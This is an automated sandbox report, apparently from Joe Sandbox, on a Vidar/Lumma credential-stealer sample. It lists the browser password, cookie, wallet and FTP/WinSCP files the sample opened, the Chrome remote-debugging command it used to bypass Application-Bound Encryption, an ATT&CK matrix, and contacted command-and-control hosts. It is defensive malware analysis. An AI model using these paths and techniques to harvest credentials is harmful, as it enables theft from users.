                  Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.8.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 5.2.aD7D9fkpII.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.aD7D9fkpII.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2333287730.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: aD7D9fkpII.exe PID: 6408, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: aD7D9fkpII.exe PID: 6584, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: aD7D9fkpII.exeString found in binary or memory: \Electrum\wallets\
                  Source: aD7D9fkpII.exeString found in binary or memory: \ElectronCash\wallets\
                  Source: aD7D9fkpII.exeString found in binary or memory: \Electrum\wallets\
                  Source: aD7D9fkpII.exeString found in binary or memory: window-state.json
                  Source: aD7D9fkpII.exeString found in binary or memory: exodus.conf.json
                  Source: aD7D9fkpII.exeString found in binary or memory: \Exodus\exodus.wallet\
                  Source: aD7D9fkpII.exeString found in binary or memory: info.seco
                  Source: aD7D9fkpII.exeString found in binary or memory: ElectrumLTC
                  Source: aD7D9fkpII.exeString found in binary or memory: passphrase.json
                  Source: aD7D9fkpII.exeString found in binary or memory: \Ethereum\
                  Source: aD7D9fkpII.exeString found in binary or memory: \Exodus\exodus.wallet\
                  Source: aD7D9fkpII.exeString found in binary or memory: \Ethereum\
                  Source: aD7D9fkpII.exeString found in binary or memory: \Coinomi\Coinomi\wallets\
                  Source: aD7D9fkpII.exeString found in binary or memory: \Exodus\exodus.wallet\
                  Source: aD7D9fkpII.exeString found in binary or memory: multidoge.wallet
                  Source: aD7D9fkpII.exeString found in binary or memory: seed.seco
                  Source: aD7D9fkpII.exeString found in binary or memory: keystore
                  Source: aD7D9fkpII.exeString found in binary or memory: \Electrum-LTC\wallets\
                  Tries to harvest and steal Bitcoin Wallet information
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                  Source: Yara matchFile source: 5.2.aD7D9fkpII.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: aD7D9fkpII.exe PID: 6584, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Attempt to bypass Chrome Application-Bound Encryption
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 5.2.aD7D9fkpII.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.aD7D9fkpII.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2333287730.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: aD7D9fkpII.exe PID: 6408, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: aD7D9fkpII.exe PID: 6584, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		2
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  Create Account                  		1
                  Extra Window Memory Injection                  		2
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		1
                  Account Discovery                  		Remote Desktop Protocol4
                  Data from Local System                  		21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  Registry Run Keys / Startup Folder                  		211
                  Process Injection                  		1
                  Software Packing                  		Security Account Manager4
                  File and Directory Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Remote Access Software                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                  Registry Run Keys / Startup Folder                  		1
                  DLL Side-Loading                  		NTDS35
                  System Information Discovery                  		Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Extra Window Memory Injection                  		LSA Secrets11
                  Query Registry                  		SSHKeylogging14
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials141
                  Security Software Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                  Virtualization/Sandbox Evasion                  		DCSync2
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                  Process Injection                  		Proc Filesystem2
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581195 Sample: aD7D9fkpII.exe Startdate: 27/12/2024 Architecture: WINDOWS Score: 100 52 t.me 2->52 54 chrome.cloudflare-dns.com 2->54 56 bijutr.shop 2->56 80 Suricata IDS alerts for network traffic 2->80 82 Found malware configuration 2->82 84 Malicious sample detected (through community Yara rule) 2->84 86 8 other signatures 2->86 9 aD7D9fkpII.exe 1 2->9         started        12 msedge.exe 641 2->12         started        signatures3 process4 signatures5 88 Attempt to bypass Chrome Application-Bound Encryption 9->88 90 Contains functionality to inject code into remote processes 9->90 92 Injects a PE file into a foreign processes 9->92 14 aD7D9fkpII.exe 31 9->14         started        18 WerFault.exe 19 16 9->18         started        21 conhost.exe 9->21         started        31 2 other processes 9->31 23 msedge.exe 12->23         started        25 msedge.exe 12->25         started        27 msedge.exe 12->27         started        29 msedge.exe 12->29         started        process6 dnsIp7 66 t.me 149.154.167.99, 443, 49704 TELEGRAMRU United Kingdom 14->66 68 bijutr.shop 188.245.216.205, 443, 49706, 49708 PARSONLINETehran-IRANIR Iran (ISLAMIC Republic Of) 14->68 70 127.0.0.1 unknown unknown 14->70 94 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->94 96 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->96 98 Tries to harvest and steal ftp login credentials 14->98 100 3 other signatures 14->100 33 msedge.exe 2 10 14->33         started        36 chrome.exe 8 14->36         started        39 cmd.exe 14->39         started        50 C:\ProgramData\Microsoft\...\Report.wer, Unicode 18->50 dropped 72 20.110.205.119, 443, 49862, 49919 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 23->72 74 204.79.197.219, 443, 49924, 49925 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 23->74 76 20 other IPs or domains 23->76 file8 signatures9 process10 dnsIp11 78 Monitors registry run keys for changes 33->78 41 msedge.exe 33->41         started        58 192.168.2.5, 443, 49428, 49703 unknown unknown 36->58 60 239.255.255.250 unknown Reserved 36->60 43 chrome.exe 36->43         started        46 conhost.exe 39->46         started        48 timeout.exe 39->48         started        signatures12 process13 dnsIp14 62 www.google.com 172.217.21.36, 443, 49731, 49734 GOOGLEUS United States 43->62 64 sb.scorecardresearch.com 43->64

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  aD7D9fkpII.exe57%VirustotalBrowse
                  aD7D9fkpII.exe71%ReversingLabsWin32.Trojan.LummaStealer
                  aD7D9fkpII.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://bijutr.shop23e5ea2dd5a0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bijutr.shop
                  		188.245.216.205
                  		truefalse
                    		high
                    chrome.cloudflare-dns.com
                    		172.64.41.3
                    		truefalse
                      		high
                      t.me
                      		149.154.167.99
                      		truefalse
                        		high
                        ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                        		94.245.104.56
                        		truefalse
                          		high
                          sb.scorecardresearch.com
                          		18.165.220.110
                          		truefalse
                            		high
                            www.google.com
                            		172.217.21.36
                            		truefalse
                              		high
                              googlehosted.l.googleusercontent.com
                              		142.250.181.65
                              		truefalse
                                		high
                                clients2.googleusercontent.com
                                		unknown
                                		unknownfalse
                                  		high
                                  bzib.nelreports.net
                                  		unknown
                                  		unknownfalse
                                    		high
                                    assets.msn.com
                                    		unknown
                                    		unknownfalse
                                      		high
                                      deff.nelreports.net
                                      		unknown
                                      		unknownfalse
                                        		high
                                        ntp.msn.com
                                        		unknown
                                        		unknownfalse
                                          		high

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          https://sb.scorecardresearch.com/b2?rn=1735284048287&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2BA4C89BEAD6644B32BDDDF9EBCF652E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                            		high
                                            https://deff.nelreports.net/api/report?cat=msnfalse
                                              		high
                                              https://bzib.nelreports.net/api/report?cat=bingbusinessfalse
                                                		high
                                                https://assets.msn.com/statics/icons/favicon_newtabpage.pngfalse
                                                  		high

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://duckduckgo.com/chrome_newtabaD7D9fkpII.exe, 00000005.00000002.2774860542.000000000473B000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000002.2773834918.0000000004373000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324994448.00001E9000730000.00000004.00000800.00020000.00000000.sdmp, Web Data.16.dr, 47GLNG.5.dr, CTJWTJ.5.drfalse
                                                    		high
                                                    https://mail.google.com/mail/?usp=installed_webappchrome.exe, 0000000B.00000003.2270461668.00001E9001549000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2329144945.00001E9001549000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2328786741.00001E900112C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326895111.00001E9000C70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://google-ohttp-relay-join.fastly-edge.com/(chrome.exe, 0000000B.00000003.2276055136.00001E90017CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2276701184.00001E90017D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/ac/?q=aD7D9fkpII.exe, 00000005.00000002.2774860542.000000000473B000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000002.2773834918.0000000004373000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2325263210.00001E90007C0000.00000004.00000800.00020000.00000000.sdmp, Web Data.16.dr, 47GLNG.5.dr, CTJWTJ.5.drfalse
                                                          		high
                                                          https://google-ohttp-relay-join.fastly-edge.com/-chrome.exe, 0000000B.00000003.2276055136.00001E90017CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2276701184.00001E90017D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditingchrome.exe, 0000000B.00000002.2324994448.00001E9000730000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2322716389.00001E9000098000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 0000000F.00000003.2392125839.000008C400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://google-ohttp-relay-join.fastly-edge.com/1chrome.exe, 0000000B.00000003.2276055136.00001E90017CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2276701184.00001E90017D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://google-ohttp-relay-join.fastly-edge.com/0chrome.exe, 0000000B.00000003.2276055136.00001E90017CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2276701184.00001E90017D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://google-ohttp-relay-join.fastly-edge.com/7chrome.exe, 0000000B.00000003.2276055136.00001E90017CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2276701184.00001E90017D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=bchrome.exe, 0000000B.00000002.2325083176.00001E9000754000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://docs.google.com/document/Jchrome.exe, 0000000B.00000002.2329144945.00001E9001549000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhonechrome.exe, 0000000B.00000002.2325498651.00001E9000858000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2323988973.00001E90004AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2328244648.00001E9000F70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ntp.msn.com/_defaultQuotaManager.16.drfalse
                                                                              		high
                                                                              http://anglebug.com/4633chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://anglebug.com/7382chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://google-ohttp-relay-join.fastly-edge.com/4chrome.exe, 0000000B.00000003.2276055136.00001E90017CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2276701184.00001E90017D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.aD7D9fkpII.exe, 00000005.00000002.2777956578.00000000049F8000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000002.2773834918.000000000433F000.00000004.00000020.00020000.00000000.sdmp, IW4WT2.5.drfalse
                                                                                      		high
                                                                                      https://issuetracker.google.com/284462263msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
